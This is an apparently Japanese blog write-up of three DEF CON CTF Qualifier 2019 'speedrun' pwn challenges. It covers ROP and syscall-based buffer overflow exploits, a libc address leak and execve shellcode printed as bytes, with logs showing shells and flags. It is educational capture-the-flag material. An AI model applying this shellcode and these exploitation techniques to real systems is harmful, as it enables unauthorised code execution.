yyy

DEF CON CTF Qualifier 2019 speedrun-001~003

speedrun-001

$ ./speedrun-001
Hello brave new challenger
Any last words?
hoge
This will be the last thing that you say: hoge

Alas, you had no luck today.

バッファオーバーフローがあるので,ROPで execve("/bin/sh", NULL, NULL) を呼ぶようにした.

gist.github.com

$ python exploit.py
[+] Opening connection to speedrun-001.quals2019.oooverflow.io on port 31337: Done
Hello brave new challenger
Any last words?

[*] Switching to interactive mode
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x86\x06@
$ ls
-
banner_fail
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
service.conf
speedrun-001
srv
sys
tmp
usr
var
wrapper
$ cat /flag
OOO{Ask any pwner. Any real pwner. It don't matter if you pwn by an inch or a m1L3. pwning's pwning.}
[*] Got EOF while reading in interactive

speedrun-002

$ ./speedrun-002
We meet again on these pwning streets.
What say you now?
hoge
What a ho-hum thing to say.
Fare thee well.

これも同様バッファオーバーフローがあり,ROPからret2libcでsystemを呼ぼうとしたがローカルではうまくいくのにリモートではうまくいかない問題が起きてて,どうやらリモートではsystem関数が使えないように制限されてたっぽいので,001同様直接システムコールを使うようにしたらシェルが取れた.

gist.github.com

$ python exploit.py
[+] Opening connection to speedrun-002.quals2019.oooverflow.io on port 31337: Done
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/speedrun-002'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/yyy/ctf/all/DEF_CON_2019/speedrun-002/libc/lib/x86_64-linux-gnu/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
We meet again on these pwning streets.
What say you now?

What an interesting thing to say.
Tell me more.

Fascinating.

leak_addr: 0x7f4b03669140
libc_base: 0x7f4b03559000
system_addr: 0x7f4b035a8440

We meet again on these pwning streets.
What say you now?

What an interesting thing to say.
Tell me more.

Fascinating.

[*] Switching to interactive mode
$ cat /flag
OOO{I_didn't know p1zzA places__mAde pwners.}
$ exit
[*] Got EOF while reading in interactive

speedrun-003

$ ./speedrun-003
Think you can drift?
Send me your drift
hoge
You're not ready.

シェルコード問題.30バイトのシェルコードを入力する必要があり,前半部分それぞれをxorした値と後半部分それぞれをxorした値が等しくないといけない.

48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f6e69622f
73 68 00
31 f6                   xor    esi,esi
56                      push   rsi
53                      push   rbx
54                      push   rsp
5f                      pop    rdi
b0 3b                   mov    al,0x3b
31 d2                   xor    edx,edx
0f 05                   syscall

シェルコードはこのようなものを使用したが,これは22バイトなのでいい感じに調整した.具体的には,前半部分を push rsp までにして,残りの部分は xor edx, edx を4つに増やすことでバイト数をかさ増ししたり,同じxor値になるように mov al, 0x3b を2つに増やし,前半の 0x3b の部分を変化させながら,最終的に mov al, 0x5a にした.

gist.github.com

$ python exploit.py
[+] Opening connection to speedrun-003.quals2019.oooverflow.io on port 31337: Done
[*] Switching to interactive mode
Think you can drift?
Send me your drift
$ cat /flag
OOO{Fifty percent of something is better than a hundred percent of nothing. (except when it comes to pwning)}
$ exit
[*] Got EOF while reading in interactive